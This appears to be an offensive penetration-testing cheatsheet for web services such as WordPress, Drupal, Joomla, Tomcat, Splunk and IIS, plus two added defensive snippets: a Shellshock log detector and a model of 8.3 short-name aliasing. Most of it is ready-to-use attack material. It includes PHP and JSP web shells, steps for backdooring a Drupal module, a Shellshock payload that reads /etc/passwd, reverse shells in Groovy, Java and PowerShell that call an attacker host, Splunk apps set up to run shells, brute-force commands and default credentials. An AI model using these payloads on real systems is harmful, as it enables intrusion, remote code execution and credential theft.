The best methodology for pentesting a service is usually to just search “Pentesting {service name}”
https://github.com/saisathvik1/OSCP-Cheatsheet?tab=readme-ov-file
WPScan
wpscan
and investigate the plugins
wpscan --url http://{IP} --enumerate --plugins-detection aggressive --random-user-agent --api-token {token}
--enumerate will automatically enumerate plugins, themes, and users, but we can cut it down to something like --enumerate vp,vt,u
[!] This version is out of date
sudo wpscan --password-attack xmlrpc -t {threads_eg_20} -U {username} -P /usr/share/wordlists/rockyou.txt --url {wp_site}
Misc
//{kali_ip}/test
with sudo impacket-ntlmrelayx --no-http-server -smb2support -t {relay_target_IP} -c "powershell -enc {reverse_shell}"
unix/webapp/wp_admin_shell_upload
will do it automatically
gato-x
to enumerate entire organizations
gato-x enum --target {org_name}
GH_TOKEN
environment variable; just add export GH_TOKEN="{token}"
to shell config file
noseyparker
to scan entire organizations for passwords
noseyparker scan --github-org={org_name}
droopescan scan drupal -u {url}
/CHANGELOG.txt
PHP filter
module and Save, allowing embedded PHP code to be executed
<?php system($_GET['cmd']);?>
and set Text format to PHP code, and Save
/node/{node_number_eg_3}
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz && tar xvzf captcha-8.x-1.2.tar.gz
<?php system($_GET['cmd']);?>
.htaccess
file (as otherwise we won’t be able to directly access the modules folder) with:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
tar cvf captcha.tar.gz captcha/
/modules/{backdoored_module}/{php_shell_file}
droopescan scan joomla -u {url}
sudo python2.7 -m pip install urllib3 certifi bs4
python2.7 joomlascan.py -u {url}
/README.txt
, media/system/js/
, administrator/manifests/files/joomla.xml
, or approx at plugins/system/cache/cache.xml
sudo python3 joomla-brute.py -u {url} -w passwords.txt -usr {username}
admin
/administrator
administrator/index.php?option=com_plugins
and disable “Quick Icon - PHP Version Check”
system($_GET['cmd']);
/docs/
/conf/tomcat-users.xml
stores user creds and roles, try tomcat/tomcat
or admin/admin
.war
file (tomcat application) to compromise the app
/manager/html
and upload the following file, zipped into an archive titled {app_name}.war
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
/{app_name}/cmd.jsp?cmd={command}
multi/http/tomcat_mgr_upload
Tomcat Common Gateway Interface (CGI)
/cgi/
or /cgi-bin
, and we can fuzz them for .cmd, .bat, .py, .perl, .sh
/welcome.bat?&{command}
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' {server}/cgi-bin/access.cgi
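Added defender-side example, not from the cheatsheet: the `() { :; };` prefix in the curl above is the part worth detecting, so this scans constructed Apache combined-format log lines for it in the request line, Referer and User-Agent fields (the only client-supplied fields that format records). Log lines, addresses and status codes are constructed.

```python
import re

# Bash function-definition prefix that Shellshock payloads (CVE-2014-6271 family)
# place in a header value; whitespace inside the braces varies between samples.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")

# Apache "combined" format: request line, Referer and User-Agent are the only
# client-controlled fields logged, so a payload in e.g. Cookie is invisible here.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 500 0 "() {:;}; /bin/cat /etc/passwd" "curl/7.88.1"
"""


def find_shellshock(log_text):
    """Return (ip, path, field) for each line whose request line, Referer or
    User-Agent carries the Shellshock prefix. The first sample hit was logged
    with status 200: a successful injection looks like an ordinary CGI request,
    so the status code is not a usable signal."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue                      # not combined format; skip rather than guess
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else m.group("req")
        for field in ("ua", "ref", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), path, field))
                break
    return hits


if __name__ == "__main__":
    for ip, path, field in find_shellshock(SAMPLE_LOG):
        print(f"shellshock pattern from {ip} against {path} in {field}")
```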
smtp-user-enum -M {VRFY/RCPT/EXPN} -U {username_list} -D {domain} -t {ip}
python3 o365spray.py --enum -U {username_list} --domain {domain}
--script smtp-open-relay
will check
swaks --from {from_email} --to {to_email} --header '{header}' --body '{body}' --server {ip}
/script
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{kali_ip}/{kali_port};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
String host="{kali_ip}";
int port={kali_port};
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();
admin:changeme
or admin:admin/Welcome/Welcome1
.bat
file to run it) and python revshell
inputs.conf
in the directory root, which tells Splunk which scripts to run (run script every 10 seconds):
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
tar -czvf {script_name}.tar.gz {script_directory_name}
/en-US/manager/search/apps/local
go to “Install app from file” and start the nc listener
{Splunk_root_dir}/etc/deployment-apps
directory on the compromised Splunk machine
prtgadmin:prtgadmin
, and versioning should be in the bottom left, with CVEs associated
{ticket_no}@{company}
/help
for fingerprinting version after being logged in
/users/sign_up
{cf_root_dir}/lib/password.properties
has encrypted passwords in key-value pairs
/secret~1/
exists, the server will return 200s for /~s
, /~se
, /~sec
, and so on, until we reach /~secret
/~secret
into /secret~1/
and fuzz the contents within the directory
/secret~1/somefi~1.txt
somefile1.txt
would become somefi~1.txt
, and somefileextrastuffhere.txt
would become somefi~2.txt
java -jar iis_shortname_scanner.jar 0 5 http://{server}/
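Added example, not part of the cheatsheet or of the scanner: a small model of how NTFS derives the 8.3 aliases that the tilde probing above relies on, reproducing the somefi~1 / somefi~2 collision numbering and listing which files in a directory would be discoverable that way. The rule set is a simplification (aliases are shown uppercase; IIS matches them case-insensitively, and the hash-based form NTFS uses after ~4 is omitted), and the filenames are constructed.

```python
import re

# Characters not allowed in an 8.3 alias (simplified; NTFS also remaps a few others).
_BAD = re.compile(r"[^A-Z0-9!#$%&'()\-@^_`{}~]")


def _split(name):
    """Split into base and extension the way 8.3 generation does (last dot wins)."""
    if "." in name.strip("."):
        base, _, ext = name.rpartition(".")
        return base, ext
    return name, ""


def needs_alias(name):
    """True when the long name cannot stand as its own 8.3 name."""
    base, ext = _split(name)
    if " " in name or name.count(".") > 1:
        return True
    return len(base) > 8 or len(ext) > 3 or bool(_BAD.search((base + ext).upper()))


def assign_short_names(long_names):
    """Map long names in one directory to the aliases NTFS would hand out, in
    creation order. Names sharing the first six characters of the base and the
    same (3-char) extension get ~1, ~2, ... in sequence."""
    counters, aliases = {}, {}
    for name in long_names:
        if not needs_alias(name):
            aliases[name] = name.upper()        # already 8.3; nothing extra for a probe to find
            continue
        base, ext = _split(name)
        base = _BAD.sub("", base.replace(".", "").replace(" ", "").upper())[:6]
        ext = _BAD.sub("", ext.replace(" ", "").upper())[:3]
        n = counters[(base, ext)] = counters.get((base, ext), 0) + 1
        aliases[name] = f"{base}~{n}.{ext}" if ext else f"{base}~{n}"
    return aliases


def exposed_via_tilde(long_names):
    """Long names that have a tilde alias, i.e. the ones a short-name probe can reveal."""
    return [n for n, a in assign_short_names(long_names).items() if "~" in a]


if __name__ == "__main__":
    # Constructed directory listing.
    for long, short in assign_short_names(["somefile1.txt", "somefileextrastuffhere.txt", "readme.txt"]).items():
        print(f"{long} -> {short}")
```

Disabling 8.3 name creation on the volume (and the handling of the `~` request) is what removes the alias, which is why `exposed_via_tilde` is the list to drive that decision from.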
nagiosadmin:PASSW0RD
system:manager
AAR
file with msf module